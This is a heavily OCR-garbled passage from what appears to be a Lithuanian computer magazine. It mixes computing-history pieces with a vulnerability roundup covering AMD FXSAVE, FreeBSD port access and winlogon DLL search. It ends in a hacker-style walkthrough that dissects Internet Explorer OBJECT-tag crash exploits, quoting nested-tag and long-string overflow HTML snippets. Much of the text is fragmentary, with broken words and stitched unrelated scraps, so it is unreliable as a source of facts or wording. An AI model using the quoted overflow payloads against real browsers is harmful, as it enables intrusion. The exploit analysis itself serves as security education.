dėl prie kompiuterio prijunc 
do pavadinimas buvo pakei Pirmas 
gremėzdiškas, korpusas buvo pagamintas 
patalpinti du metaliniai ratukai. Vien 
galima tiktai vertikaliai arba horizonte 
mokymo centre įvyko pusantros vala 
kur kompiuterių pasaulis pirmą karta į 
valdomą grafinę sistemą. Po dviejų metu Eng 
pelę (čia ji vadinama atvaizdavimo 
katoriumi) bei pratęsė savo darbus GUI tobulinime. Deja, kai kurie 
tyrimų grupės nariai nesutiko su tam tikromis Engelbarto idėjomis 
todėl po kurio laiko šie mokslininkai perėjo dirbti į „Xerox“ (PARC) 
linkos viziją 
vartotoju 


i patogia kompiu 
Jovavo Dugl: 


darbui 


nešė didž 


ąją Idėjų dalį 


'ių hipernuorodų 
niu, kurį taip p ūrė Du- 
tačiau 


abalu 


čio lai- 


stambiame 


statymas 


I pele 


tavo 


imndi- 


em. 


kokią mes ją žinome šiandien 
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ARPANET 

Pirmosios suformuluotos mintys apie galimybę apjungti kompiuterius 
įtinklą pasirodė dar 60-ujų metų pradžioje. 1965 metais mokslininkai 
išMITir Berklio universiteto pirmą kartą šias mintis išbandė praktiškai, 
per telefonines linijas nutolusius kompiuterius. Po dviejų 
1 stambioje konferencijoje susirinko mokslininkai iš ARPA agen- 
tūros ir kai kurių tyrimų institutų, kur buvo aptariami efektyviausi tinklo 
iš keleto mašinų sukūrimo būdai Šiame ir tolimesniuose susitikimuo- 
se buvo sukurti pagrindiniai ARPAnet principai, todėl teliko parašyti 
duomenų priėmimo ir perdavimo protokolą. 1968 metų gruodį BBN 
(Bolt, Beranek and Newman) mokslininkų grupė pristatė /nterface 
Message Processors (IMP's) — pirmą tinklo protokolą, o vos po metų 
pirmaujančių mokslo centrų kompiuteriai, pradedant UCL A institutu, 
buvo pradėti apjungti į vieningą mokslinį tinklą. 

Per 70-uosius metus ARPAnet nuolat augo ir plėtojosi. Būtent šiuo 
metu atsirado email, FTP beikitos galimybės, kurios sėkmingai nau- 
dojamos ir šiandien, 1981 metais ARPAnet tinkle buvo 213 kompiu- 
terių, o po 8 metų šis skaičius viršijo 100 tūkstančių kartelę 


Lankstusis diskelis („floppy disk“) 

1967 metais IBM savo San Jose tyrimų skyriui davė naują užduotį 
Reikėjo sukurti paprastą ir nebrangią sistemą, skirtą automatiniam mi- 
krokodo užkrovimui System/370 kompiuteriuose. Kodo užkrovimas iš 
juostos trukdavo ilgai, be to, kaupikliai buvo per daug dideli, kas ne- 
tenkino IBM. Vienas ties šia užduotimi dirbusių mokslininkų Deividas 
Noblas (David Noble) išbandė daugybę įvairiausių sprendimų, kol ne- 
sukūrė taip vadinamo „atminties disko“, kuris vėliau buvo pavadintas 
lanksčiuoju diskeliu“. Pirmųjų diskelių dydis siekė 8 colius, jie galėjo 
sutalpinti 80 Kb informacijos ir buvo vien tik skaitomi (read-only). Taip 
pat jie nebuvo dedami į plastikinį vokelį, kuris atsirado kiek vėliau dėl 
greito užterštumo problemų. Naujasis diskelių formatas buvo prista- 
tytas 1973 metais, jis leido padidinti dydį iki 250 Kb ir padaryti diskus 
perrašomais. Diskeliai pasirodė esą nepalyginamai patogesni už 
perfokortas ir juostinius kaupiklius, tačiau dėl didelės kainos kol kas 
buvo naudojami ribotai. Vienas diskelis kainavo praktiškai tiek pat, kiek 
Ir paprastas kompiuteris. Situacija pasikeitė po to, kai buvo apibrėžti 
standartai ir dešimtys kompanijų ėmėsi gaminti bei tobulinti lanksčiuo- 
sius diskelius. Tai smarkiai sumažino kainą, todėl diskeliai greitai išstū- 
mė kitus informacijos kaupiklius. 1975 metais buvo sukurtas naujas 5 
colių standartas, o abiejų diskelio pusių panaudojimas leido dvigubai 
padidinti jo talpą. 1981 metais „Sony“ pristatė pirmąjį 3,5 colio diskelį 
kietame vokelyje, kuris 90-aisiais metais tapo de facto standartu 
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Mikroprocesorius 

1971 metų lapkričio 15 dieną tuomet dar menkai 
nija „Intel“ pasauliui pristatė pirmąjį mikroprocesorių „Intel 4004 
Jis buvo kuriamas specialiai skaičiuotuvus gaminančiai japonų 
kompanijai „Busicom“, tačiau greitai paaiškėjo, kad naujovę galima 
naudotiir daugelyje kitų sričių. Kompanijos inžinieria -Federikui 
Feginui (Federico Faggin), Tedui Hofui (Ted Hoff) ir Stenui Meizorui 
(Stanley Mazor) — pavyko į maždaug 4 milimetrus sutalpinti tokio 
monstro kaip UNIVAC skaičiavimo galią. „Intel“ 4004 procesoriuje 
buvo 2300 tranzistorių, CPU, komandų registras, dekoderis ir maši- 
ninių komandų monitorius, jo kaina tuomet siekė 200 dolerių. 4004 
buvo praktiškai pritaikomas kelių šviesoforų valdyme, kraujo anali 
zatoriuoseir net NASAkosminiuose zonduose. Vis dėltotikroji mikro: 
procesorių revoliucija prasidėjo išleidus 8080, kuris buvo sukurtas 
specialiai kompiuteriams. Būtent ši mikroschema buvo naudojama 
viename iš pirmųjų asmeninių kompiuterių „Altair 8800". Atsiradus 
mikroprocesoriams, pasikeitė pati kompiuterių kūrimo technolo- 
gija. Jeigu anksčiau kompiuterių tiekėjai (IBM, „Digital Eguipment 
Corporation“, „Hewlett Packard“) gamindavo visą kompiuterį, tai 
pradėjus atskirai tiekti mikroschemas ir atsiradus kitas kompiuterių 
komplektuojančias dalis gaminančioms kompanijoms, tapo įmano: 
ma mašiną surinkinėti, o ne pirkti kaip fizinį vienetą 


žinoma kompa 


Ethernet 
Kaipir daugelis kitų kompiuterinių išradimų, Ethernet buvo sukurtas 


„Xerox“ tyrimų centre. Idėjos autoriumi tapo Robertas Metkalias (Ro: 
bert Metcalfe), kurio paprašė sukurti PARC kompiuterius sujungiantį 
tinklą. Centro mokslininkaivisai neseniai prieštai buvo sukūrę pirmąjį 
kompiuterių istorijoje lazerinį spausdintuvą, ovadovybė norėjo, kad 
su šiuo spausdintuvu būtų galima spausdinti iš bet kurio kompiute- 
rio. Metkalfui buvo iškilusios dvi pagrindinės problemos: padaryti 
tinklą pakankamai greitą, kad spėtų kartu su spausdinimo greičiu 
bei sugalvoti, kaip sujungti šimtus viename pastate veikiančių maši- 
nų. Vos potrejų metų Metkalfas išpublikavo dokumentą pavadinimu 
„Ethernet: paskirstytas paketų komutavimas lokaliuose kompiuterių 
tinkluose" (Ethernet: Distributed Packet-Switching For Local Com- 
puter Networks), kuriame buvo aprašomi 3 megabitų lokalaus tinklo 
sukūrimo principai. 1979 metais Robertas išėjo iš „Xerox“ norėda 
mas masėms paskleisti asmeninių kompiuterių ir kompiuterių tinklų 
idėjas, taigi jis tam įkūrė kompaniją „3Com“. Būtent dėl jo atkaklumo 
beijtikinamumo DEC, „Intel" ir „Xerox“ padarė Ethernet standartiniu 
protokolu, kuris ir šiandien naudojamas LAN kūrime 
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PC ZONE 


Asmeninis kompiuteris 

70-ujų viduryje Styvas Vozniakas (Steve Vozniak) buvo tipiškas 
techno gykas: dieną dirbdavo „Hewlett Packard“ kompanijoje, o 
vakarais kapstydavosi Altair tipo kompiuterinių konstruktorių deta- 
lėse. Vieną gražią dieną Styvas suvokė, kad pagrindinės kompiu- 
terių komplektuojančios dalys (tokios, kaip procesorius ir atmintis) 
taip atpigo, kad už mėnesio atlyginimą galima įsigyti viską, ko reikia 
nuosavam kompiuteriui surinkti. Vaikinas rimtai užsidegė šia idėja 
ir, į šį reikalą įtraukęs savo bičiulį Styvą Džobsą (Steve Jobs), visą 
savolaisvą laiką praleisdavo tėvo garaže su lituokliu rankose, 1976 
metų pradžioje darbas buvo pabaigtas: Apple / turėjo 4 Kb plečia- 
mos atminties, 1 MHz procesorių MOS 6502 ir medinį korpusą su 
klaviatūra. Nepaisant to, kad Styvas Vozniakas kompiuterį kūrė sau, 
Džobsui pavyko bičiulį įtikinti pabandyti jį parduoti. Pirkėjų greitai 
atsirado ir neilgai trukus 200 rankiniu būdu surinktų Apple'ų buvo 
parduoti po 666 dolerių. Apple I buvo pirmasis parduodamas pilnai 
veikiantis asmeninis kompiuteris, kurio nereikia prieš naudojimą su- 
rinkti. 1977 metų balandžio 17 dieną pirmoje Amerikos kompiuterių 
mugėje draugai pristatė naująjį savo kompiuterio modelį Apple II, 
kuris dėl savo galimybių ir prieinamumo tapo labai populiarus tarp 
paprastų vartotojų ir taip pradėjo asmeninių kompiuterių erą. 


Kompiuterių virusas 

Kompiuterių virusų evoliucija prasidėjo 1982 metais nuo penkioli- 
kmečio mokyklinuko Ričardo Skrentos (Richard Skrenta) kūrinio. Jo 
parašytas virusas (Elk Cloner) užkrėsdavo Apple II sistemas iš infe- 
kuotų diskų patekdamas į kompiuterio atmintį ir tikrindamas naujus 
diskelius. Jeigu įdėtas diskelis būdavo neužkrestas, taivirusas save 
į Jį kopijuodavo, lėtai persikeldamas iš disko į diską. Kaip ir daugelis 
ankstyvųjų virusų, Elk Cloner buvo nekenksmingas, tačiau kas 50 
paleidimų į ekraną išvesdavo trumpą eilėraštuką 

Elk Cloner: The programwith a personality 

Itwill get on all your disks 

It will infiltrate your chips 

Yesit's Cloner! 

It will stick to you like glue 

It will modify ram too 

Sendinthe Cloner! 

Buvo įtariama, kad virusas galėjo pakenkti diskeliui su neįdiegta 
operacine sistema. Nepaisant to, kad Elk Cloner plačiai nepaplito 
irkad jo aukomis pagrinde tapo Ričardo draugai ir pažįstami (įskai 


tantir mate Ą),Ši programa tapo pirmuoju užtiksuotu 
kompiuterių virusu, paplitusiu už jo kūrėjo kompiuterio ribų 
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Nešiojamasis kompiuteris (,„notebook“) 
Pirmieji nešiojamieji kompiuteriai nebuvo panašūs į sudedamą kny: 
gutę, tačiau jie buvo portatyviniai, oilgainiui buvo sukurti ir tokie nešio- 
jamieji kompiuteriai, kokius juos mes matome šiandien Šiuolaikinių 
nešiojamųjų kompiuterių protėviu greičiausiai tapo Viljamo Mogridžo 
(William Moggridge) sukurtas kompiuteris. Jis svėrė 5 kartus mažiau 
nei pagal savo našumą analogiškos mašinos, NASA jį naudojo šatlų 
paleidimo programose. Pirmuoju komerciniu nešiojamuoju kompiu 
teriu tapo Osborne 1, kurį 1981 metų balandį pristatė kompiuterių 
kompanija Osborne. Jis svėrė 12 kilogramų, turėjo 4 MHz proc 
Z80, 64 Kb atminties, 5 colių diskasukį, miniatiūrinį 5 colių ekraną ir 
kainavomaždaug 2000 dolerių. Vietoje OS buvo naudojama tuo metu 
populiari CP/M 2.2 sistema. Be o šito, komplekte buvo pateikia 
ma tekstų apdorojimo programa WordStar, skaičiuotuvas Supercalc 
(excel protėvis), darbo su duomenų bazėmis programa dBase I! ir 
programavimo kalba Basic. Neilgai trukus po to, kai buvo pradėtas 
pardavinėti šis kompiuteris, atsirado daugybė kitų kompanijų, kurios 
siekė šioje šviežioje rinkoje gauti savo pelno dalį, gaminamų pirmojo 
nešiojamo kompiuterio klonų. Vis dėlto tikru Osborne konkurentu tapo 
Kaypro|l — naujos kartos nešiojamasis kompiuteris su praktiškesniu 
9colių ekranu ir dvigubo tankumo diskais, kuriuose buvo galima sau- 
goti dvigubai daugiau informacijos. Osborne nesugebėjo tinkamai į 
tai atsakyti ir neilgai trukus bankrutavo. 


sorių 


MP3 

1987 metais prestižinis Vokietijos Fraunhoferio institutas pradėjo 
naują tyrimų projektą EURIKA, kurio tikslas buvo urti nauj 
dio signalo suspaudimo būdus neprarandant kokybės. Pagrindiniu 
kūrėju buvo Karlas Heinsas Brandenburgas (Karl! Heinz Branden 
burg) — žymus matematikas ir suspaudimo specialistas. Jis sukū- 
rė šaldytuvo dydžio aparatą, kuris galėjo muzikinę bylą suspaU 
iki 896 jos originalo dydžio. Po to profesorius savo jėgas sukaupė 
panašaus suspaudimo atkūrimui, panaudojant tan tikrą algorilimą 
Jo darbo rezultatu tapo MPEG-1 Layer 3, kuris buvo aptartas 1988 
metų gegužę, 25 Moving Picture Experts Group (specialus ISO ko- 
miteto daugialypės terpės (multimedia) standartų skyrius) dalyvių 
susitikime. Kiek vėliau institutas šį formatą užpatentavo. Prireikė dar 
kelerių metų, kad algoritmas virstų pilnaverčiu suspaudimo formatu 
leidžiančiu muzikinę bylą neprarandant kokybės suspausti iki 10 
kartų. Tokių rezultatų pavyko pasiekti atsijojus „nežymias" garso da- 
lis, kurių žmogaus klausa nesuvokia. 90-ųjų pradžioje mp3 formatas 
buvo naudojamas profesionaliose programose, o išsiplėtojus inter- 
netui tapo labai populiarus 
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Www 

WWW yra vienas įtakingiausių kompiuterinių išradimų. Jo koncep- 
cija buvo sukurta 1989 metais, Ženevoje esančioje Europos Bran- 
duolinių Tyrimų Organizacijoje (CERN — Conseil Europėen pour 
la Recherche Nuclėaire, pranc.). Šios koncepcijos autorius Timas 
Bernersas-Ly (Tim Berners-Lee) ilgokai tinklo visuomenei bandė 
paaiškinti, kad hipernuorodų aplinka kompiuteriniams tinklams yra 
optimali. Jo niekas nepalaikė, todėl jis nusprendė savarankiškai 
užsiimti šios idėjos įgyvendinimu. 1990 metų spalį Timas pradėjo 
dirbti prie hipertekstinės naršyklės su grafine sąsaja, kurią pava- 
dino World Wide Web. Po metų alt.hypertext naujienų grupėje jis 
išpublikavo išsamią dokumentaciją. CERN vadovybė pritarė Timo 
koncepcijai ir po testavimo savo kompiuteriuose pristatė WWW pla- 
čiajai visuomenei. Webas iš tiesų populiarus tapo 1993 metais atsi- 
radus grafinei naršyklei Mosaic, kuri neišraiškingas hipernuorodas 


pavertė į tą internetą, kokį mes jį žinome šiandien 


1989 


Java 

Programavimo kalba Java gimė „Sun Microsystems" gelmėse kaip 
vienas iš vidinių kompanijos projektų. Kūrėjų komandai, kurią suda- 
rėinžinierius Patrikas Notonas (Patrick Naughton) beijo pagalbinin- 
kai Džeimsas Goslingas (James Gosling) ir Maikas Šeridanas (Mike 
Sheridan), buvo patikėta sukurti naują „protingų“ naujos kartos bui- 
tinių prietaisų programavimo technologiją. Notonas su kolegomis iš 
pradžių kaip pagrindą ruošėsi naudoti C++, tačiau paaiškėjo, kad ši 
kalba pernelyg sudėtinga, blogaitinka darbui su sistemine atmintimi 
irgreitam perkėlimui į skirtingus įrenginius. SUN vadovas Bilas Džo- 
jus (Bill Joy) pasiūlė apjungti geriausias Mesa ir C kalbų savybes 
po ko Goslingas pradėjo eksperimentuoti su C++, ją plėsdamas ir 
madifikuodamas. Visa tai baigėsi tuo, kad jis metė šią mintį ir sukūrė 
visiškai naują programavimo kalbą, pavadinta Oak po jo biuro lan- 
gais augančio medžio garbei (angl. ąžuolas). Komanda prie pro- 
jekto entuziastingai dirbo toliau, ir 1992 metų rugsėjo 3 dieną įvyko 
interaktyvios aplinkos pristatymas, kuri apjungė naują operacinę 
sistemą Green, programavimo kalbą, bibliotekas ir techninę įran- 
gą. Projektas buvo pavadintas First Person Inc. , jį buvo planuojama 
naudoti televizijoje. Vis dėlto po to, kai televizijos industrija atsisakė 
SUN paslaugų, kompanija savo jėgas nusprendė nukreipti interne- 
tui užkariauti. Oak kalba buvo pervadinta į Java ir pristatyta kaip 
interaktyvios tinklo aplinkos kūrimo platforma 
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Flash 

90-ųjų pradžioje maža programinės įrangos kūrimo kompanija 
FutureWave Software, kurioje dirbo 6 žmonės, išleido programą 
SmartSketch. Su ja buvo galima piešti nesudėtingą planšetiniams 
kompiuteriams skirtą grafiką. Kai internetas pradėjo populiarėti 
kompanija nusprendė į savo programą pridėti animacijos galimybę 
ir pritaikyti SStinklo aplinkai. 1996 metų gegužę FutureWave pristatė 
savo naująjį produktą FutureSplash Animator, kuris priminė savo 
pirmtaką, tačiau turėjo kur kas daugiau grafinių galimybių ir orien- 
tavosi į animaciją. Programa užėmė mažai vietos, todėl idealiai tiko 
naudojimui internete, kur parsiunčiamų bylų dydis daugeliui varto- 
tojų buvo kritiškas. Technologija neliko nepastebėta: „Microsoft“ ją 
panaudojo kuriant Microsoft's MSN svetainę, o „Disney savo 
naujame portale Daily Blast. 1996 metų gruodį „Macromedia“ —vie- 
nas iš pirmaujančių grafinių paketų gamintojų — atkreipė dėmesį į 
mažą, tačiau perspektyvią kontorą ir priėmė ją po savo sparneliu 
Splashbuvoiš karto pervadinta Macromedia Flash,okitaips metais 
išėjo antroji programos versija su stereo garso ir enhanced bitmap 
galimybe. Praktiškai iš karto po savo atsiradimo /lash technologija 
tapo populiaria kuriant interaktyvias svetaines, prezentacijas ir re- 
klaminius klipus, o pastaraisiais metais taip pat atsirado daugybė 
flash filmukų 


Skype 

Skype — tai p2p technologijų pagrindu sukurta internetinės telefo- 
nijos (Vo/P) sistema. Jos kūrėjais tapo KaZaA autoriai Janus Friis ir 
Niklas Zennstrom, kurie norėjo pateikti kažką naujo prieš paplitusius 
VolP protokolus SIP ir H.323. Su Skype skirtingose pasaulio pusėse 
gyvenantys ir specialią programą parsisiuntę internautai gali vie- 
nas su kitu šnekėti visiškai nemokamai. Už nedidelį mokestį galima 
skambinti iš kompiuterio į įprastinius telefonus, priimti jų skambu- 
čius ir balso pranešimus. Priešingai nei su įprastiniais tarptautiniais 
skambučiais, Skype sistemoje atstumas neturi reikšmės. Vienos 
pokalbio minutės kaina siekia apie du centus, tuo pačiu visiškai 
nesvarbu, ar tu skambini draugui į Ameriką, ar iš savo kompiuterio 
įsavo namų telefoną. Neseniai „eBay“ už 2,6 milijardo dolerių nusi- 
pirko „Skype Group“ ir pažadėjo artimiausioje ateityje internetinę 
telefoniją padaryti populiaresne už įprastinius tarpmiestinius telefo- 
no skambučius. Be to, 2005 metais gamintojai pristatė keletą naujų 
galimybių, įskaitant video ir telekonferencijas (IRC balsu) 
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pirmieji 32 su is FXSAVE/FXRSTOI 

atstalomų duor (32 bit 


Das 1 
[*] 5 Demi 
pirmieji 32 su instrukcijomis FXSAVE/FXRSTOR išsaugomų, 


alstalomų duomenų baitai (64 bitų formatas) 


>EIP/RIP, FOP ir Data Pointer reikšmės 
išsaugomos tik tuomet, kai nustatytas ES bitas 


Skylė AMD K7/K8 procesoriuose 
BRIEF 

2006 metų balandį AMD K7/K8 proceso- 
riuose buvo aptikta skylė, leidžianti vienam 
procesoriui žvilgtelėti į kito procesoriaus ko- 
procesorinio konteksto vidų, kas veda link 
duomenų nutekėjimo ir supaprastina kripto- 
grafinių sistemų atakas (www.securityfocus. 
com/bid/17600) . Greitam konteksto perjungi- 
mui Linux ir BSD sistemos naudoja komandų 
fxsave/fxrstor jungtį, kurios į/iš operatyvinės 
atminties išsaugo/atstato koprocesoriaus 
registrus. Fxrstor klasta slypi tame, kad ji ko- 
mandų rodyklę (FIP), duomenų rodyklę (Data 
Pointer) ir paskutinės instrukcijos opkodą iš- 
saugo tik tuomet, kai koprocesoriaus x87 bū- 
senos žodyje nustatytas ES (exception sum- 
mary) bitas. Perjungus kontekstą operacinė 
sistema neišvalo šių duomenų, todėl jie lieka 
prieinami „pašaliniams“ procesams. 


TARGETS 

Griežtai šnekant, tai ne klaida, o dokumentuo- 
ta AMD procesorių ypatybė, į kurią anksčiau 
niekas nekreipė dėmesio, kadangi su /nte/ 
procesoriais šiuo atžvilgiu viskas gerai. Pažei- 
džiamumas aktualus visoms Linux ir BSD siste- 
moms, taip pat gali būti, kad ir Windows. 


EXPLOIT 

Norint įgyvendinti ataką eksploitas nėra būti- 
nas —tiesiog pakanka cikle vykdyti komandą 
fxsave ir tikėtis pagauti ką nors įdomaus. 


SOLUTION 

Linux/BSD kūrėjai jau išleido pataisymus (se- 
curityfocus.com/bid/17600/solution), kurie iš- 
valo ES bitą ir į kKoprocesoriaus steką užkrauna 
fiktyvius duomenis. Štai BSD skirto pataisymo 
fragmentas: 


Eksploitų apžvalga 


“+ 424242 424. | 


> Pats AMD-64 


Skylė AMD x86-64 procesoriuose 
BRIEF 

Jari Kirma — vienas iš FreeBSD kūrėjų — at- 
kreipė dėmesį į tai, kad su AMD x86-64 pro- 
cesoriais neprivilegijuotas vartotojas iš taiko- 
mojo lygio gali gauti tiesioginį priėjimą prie 
įrangos. Tai paaiškinama tuo, kad x86-64 
turi du privilegijų dalinimo mechanizmus. 
Branduolio lygyje vykdomas kodas turi pri- 
ėjimą prie visų įvedimo/išvedimo jungčių ir 
jis paprastai yra „tarpininkas“ tarp geležies 
ir user-mode, kas ne visada patogu, todėl 
procesorius palaiko specialią plokštę, kuri 
leidžia „atidaryti“ dalį jungčių ir suteikti prie jų 
priėjimą iš taikomojo lygio. Esmė tame, kad iki 
patFreeBSD/AMD64 5.4-RELEASE ši lentelė 
būdavo inicializuojama neteisingai, taip sau- 
gumo sistemoje paliekant didelę skylę. Pikta- 
valis (arba nekorektiškai veikiantis kodas) gali 
sukelti atsisakymą aptarnauti, sugadinti arba 
pagrobti informaciją. 


TARGETS 

Pažeidžiamumas aktualus tik FreeBSD 5.4 ir 
senesnėmss sistemoms, veikiančioms AMD 
xX86-64 platformoje. Visose likusiose sistemo- 
se šios skylės nėra. 


EXPLOIT 
Norintrealizuoti ataką eksploitas nėra būtinas — 
pakankasukurti išimčių apdorotuvą ir nuosekliai 
perrinkinėti visas jungtis, taip bandant nustatyti, 
kurias iš jų galima rašyti/skaityti, okurių — ne. 


SOLUTION 

Egzistuoja keletas šios problemos sprendi- 
mų: pavyzdžiui, atnaujinti sistemą iki 5-STA- 
BLE versijos arba įdiegti pataisymą, o po to 
perkompiliuoti branduolį. 


> Procesas winlogon.exe pagal nutylėjimą dinami 
nių bibliotekų ieško ir vartotojo namų kataloge 


“Skylė privilegijuotame procese 
„Winlogon.exe“ 

BRIEF 

2006m. rugpjūčio 8 dieną iš karto du specialistai 
išLeviathan Security Group atkreipė dėmesiįjtai, 
kad procesas winlogon.exe dinaminių bibliotekų 
paiešką pradeda nuo vartotojo namų katalogo ir 
tik po to pereina į sisteminį Windows katalogą, 
todėl bet koks savo namų kataloge „užkrėstą“ 
DLL padėjęs vartotojas savo privilegijas gali len- 
gvai sukelti iki SYSTEM. Nuotolinė ataka lengvai 
atliekama per kenkėjišką web puslapį, kuriame 
prašoma vartotojo vardo ir slaptažodžio. IE juos 
išsiunčia automatiškai ir, jeigu kompiuteris |ei- 
džia nuotolinius prisijungimus (kas būdinga ser- 
veriams), kenkėjui pakanka į HOME įmesti DLL, 
išeitiišsistemosir potojjąjeiti dar kartą. Išsamiau 
apie tai gali paskaityti čia: www. microsoft.com/ 
technet/security/Bulletin/MS06-05 1. mspx. 


TARGETS 
Pažeidžiamosšios sistemos: Windows 2000,XP 
SP1, XP SP 2, Server 2003 ir Server 2003 SP1.. 


EXPLOITS 
Norint įgyvendinti šią ataką eksploitas nėra 
būtinas. 


SOLUTION 

„Microsoft“ jau išleido visoms pažeidžiamoms 
sistemoms skirtus pataisymus bei išsaugojo 
juos savo parsisiuntimui skirtuose serveriuose. 
Jeigu dėl kokių nors priežasčių jie nėra prieina- 
mi, galima imtis alternatyvaus sprendimo, t.y. 
įdarbinti saugios dinaminių bibliotekų paieš- 
kosrežimą. Tam reikia paleisti sisteminio regis- 
tro redaktorių (regedt32.exe), atidaryti šaką 
HKLMNSYSTEMCurrentControlSeN. ControN 
Session Manager ir joje pridėti naują DWORD 
tiporaktą „SafeDIlSearchMode“, kurio reikšmė 
turėtų būti 1, otada perkrauti mašiną. 
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IE: viskas 
Kaip seniau 


NESPĖJO „MICROSOFT“  ATSIGAUTI 
PO TEXTRANGE() SKYLĖS, KURIOS PA- 
TAISYMAS BUVO IŠLEISTAS NET PO 3 
SAVAIČIŲ, KAI LYGIAI PO MĖNESIO Ml- 
CHAL ZALEWSKI NEMODERUOJAMAME 
GROK'Ų FORUME IŠPUBLIKAVO PRA- 
NEŠIMĄ „MSIE (MSHTML.DLL) OBJECT 
TAG  VULNERABILITY“, APRAŠANTĮ 
KEISTĄ IE ELGSENĄ DIRBANT SU ĮDĖ- 
TAIS OBJECT 'AIS, BEI PATEIKĖ KETURIS 
DEMONSTRACINIUS EKSPLOITUS, LIU- 
DYTOJŲ TEIGIMU LAUŽIANČIUS VISAS 
IE VERSIJAS NUO 5.X IKI 7.X IMTINAI. 


Priešistorė 

Michalo pranešimas neliko nepastebėtas, todėl jis greitai pasiro- 
dė Secunia svetainėje, kur šiai skylei buvo priskirtas aukščiausias 
pavojingumo lygis, suteikiantis galimybę persiųsti shell-kodą 
(secunia.com/advisories/19762/). Analogiškos nuomonės laikėsi 
ir „French Security Incident Response Team“ grupė (www frsirt. 
com/english/advisories/2006/1507/), tuo tarpu vaikinai iš Security. 
Focus pasirodė esą labiau susilaikantys su prognozėmis, todėl 
skiltyje „class“ jie paliko „unknown“ (www.securityfocus.com/ 
bia/17820/into). 

Visi kiti (tame tarpe ir populiarus kompanijos F-Secure blogas, kurį 
gali rasti adresu www f-secure.com/weblog) elgėsi taip, lyg nieko 
ir nebūtų nutikę, jua ir neaišku, kada jis bus (ir ar apskritai bus: kai 
kurių klaidų Microsoft nepripažįstao labiau, kad iš Microsoft nebu- 
vogautajokios informacijos. Pataisymo nėrištisus metus). Praėjusį 
kartą mus gelbėjo pašalinės firmos (pakanka prisiminti Ilfako Gil- 
fanovo pataisymą, užlopantį wmnf skylę), tačiau dabar vartotojams 
tenka pasikliauti pačiais savimi arba pereiti prie alternatyvių nar- 
šyklių ir pašto klientų, iš kurių labiausiai apsaugotais lieka Opera 
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MS IE OBJECT 
tag exploit 
aprašymas 


ir Lynx, tuo tarpu FireFox klaidų skaičius smarkiai auga, todėl juo 
naudotis nerekomenduojama. 

Hakeriai triumfuoja! Galų gale atsirado rimta skylė, į kurią šio 
pasaulio galingieji nekreipia dėmesio. Sunku įsivaizduoti, kiek 
pasauliniame tinkle yra pažeidžiamų mašinų ir ką su visu tuo ga- 
lima nuveikti, jeigu į proof-of-concept exploit prifarširuoti trotilo. 
Svarbiausia čia nustatyti, kur būtent lūžta IE ir kur perduodamas 
valdymas. Tai puikus pavyzdys, leidžiantis pademonstruoti, kaip 
dirba hakeriai. 


Parengiamasis tyrimas 

Visus eksperimentus su eksploitais geriausia atlikinėti atskiroje ma- 
šinoje, kuri būtų paleista, pavyzdžiui, su VM Ware. Mes naudosime 
Windows 2000 SP O ir IE 5.00.2920. Likusios IE versijos laužiamos 
analogišku būdu, skiriasi tik adresai. 

Paleidžiame Opera arba ReGet ir į lokalų diską išsaugome pirmąjį 
proot-of-concept exploit: http:/lcamtuf.coredump.cx/iedie2-1.html 
(iš principo išsaugoti galima, tame tarpe ir su pačiu IE, tačiau tik 
išsaugoti, o ne spausti pačią nuorodą!). Atsidarome parsiųstą bylą 
FAR'e (spausk <F3>) ir žiūrim, ką turim: 


<STYLE></STYLE> 
<OBJECT> 

Bork 
<STYLE></STYLE> 
<OBJECT> 

Bork 


Hm, tiesiog matome daug įdėtų (t.y. neuždarytų) OBJECT tagų, at- 
skirtų mįslingu vardu Bork, kuris be viso kito yra skustuvus gaminan- 
čios kompanijos prekinis ženklas. Tiek jauto, palikime skustuvus ra- 
mybėje ir patikrinkime exploder'io reakciją. IE 5.0 ramiai suvirškina 
tai, ką mes jam sušėrėm, ir visa tai normaliai atvaizduoja. 

Su antru eksploitu (http:/Acamtuf.coredump.cx/edie2-2.html) 
mums pasiseka kur kas labiau. Iš pirmo žvilgsnio, viskas tiesiog pui- 
ku, ir, nepaisant įtartinų tuščių kvadratų, IE šį puslapį atvaizduoja 
ganėtinai korektiškai, tačiau uždarant naršyklę IE lūžta kažką vapė- 
damasapie kritinę klaidą, pokoj DrWatson logą pridedamas naujas 
įrašas (savaime suprantama, taip daromatik tuomet, jeigu drwatson 
yrajust-in-time derintuvas pagal nutylėjimą). 


31 


Galų gale atsirado rimta skylė, į kurią šio | ) - 22 a 
pasaulio galingieji nekreipia dėmesio. k S B 


IE5.0reakcija į IEdie2-1 — viskas atvaizduojama normaliai 


IE 5.0 reakcija į IEdie2-2 — lūžimas uždarymo metu 


Paprastai taip nutinka sugadinus dinaminę atmintį (taip vadina- 
mą krūvelę — heap), vienok mes neskubėsime su išvadomis, 0 
pažiūrėsime, kuo pirmasis eksploitas skiriasi nuo antrojo. 


Iš pradžių mes matome daugybę korektiškai uždarytų OBJECT'ų su 
IE 5.0 naršyklei nežinomu tagu <X>, kuris ir yra tų tuščių kvadratų šal- 
tinis, tuo tarpu toliau pasikartoja ankstesnio eksploito kodas. Vienok 
antruatveju IE lūžta, o pirmu—ne. Kodėl? Galbūt prieštai lūžimui trūko 
daugiau įdėjimo lygių (daugiau neuždarytų OBJECT tagų)? Su FAR 
atsidarome iedie2-1.html (spausk <F4>) ir du-tris kartus padidiname 
OBJECT'ų kiekį. Iš naujo užkrauname šį puslapį su IE ir... vualia! Gau- 
dom išimtį uždarant programą! Tikiuosi, mintį supratai? 

Trečiasis eksploitas (Attp;Acamtuf.coredump.cx/iedie2-3.html) priver- 
čialEgiliaisusimąstyti, dėlkoeeksploito darbas automatiškai pasibaigia 
avariniu režimu. Štaijis — perpildymas! 

Ziūrim į kodą. 
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Koksdar,<OBJECT> </OBJECT> <X>Bork</X>*?!Jukmesjauišsiaiški- 
nome,kadIEšiąkonstrukciją apdoroja ganėtinai korektiškai. Atsidarome 
šią bylą (FAR'e spausk <F4>) ir išmetam visą tekstą iki pat „<STYLE></ 
STYLE>*!Užkrauname eksploitąIEir...vėltas pats susimąstymas, kuris 
pasibaigia išimtimi. Tai reiškia, jog „<OBJECT></OBJECT> <X>Bork</ 


IE 5.0 reakcija į IEdie2-2 — naršyklė lūžta, 
atvaizduoti tekstą 


bandydama 


X>" čia visai nė prie ko, o realus perpildymas įvyksta dėl „<OBJECT 
type=AAA...AAA>" konstrukcijos, kurios link ir reikia kapstyti. 
Ketvirtasiseksploitas (http:/Acamtuf.coredump.cx/iedie2-4.html)visu 
kuo pakartoja trečiąjį, tiktai „AAA“ eilučių ilgis čia kiek kitoks, tačiau 
nepaisant to išimtis vis tiek susidaro, o tai reiškia, kad perpildymas 
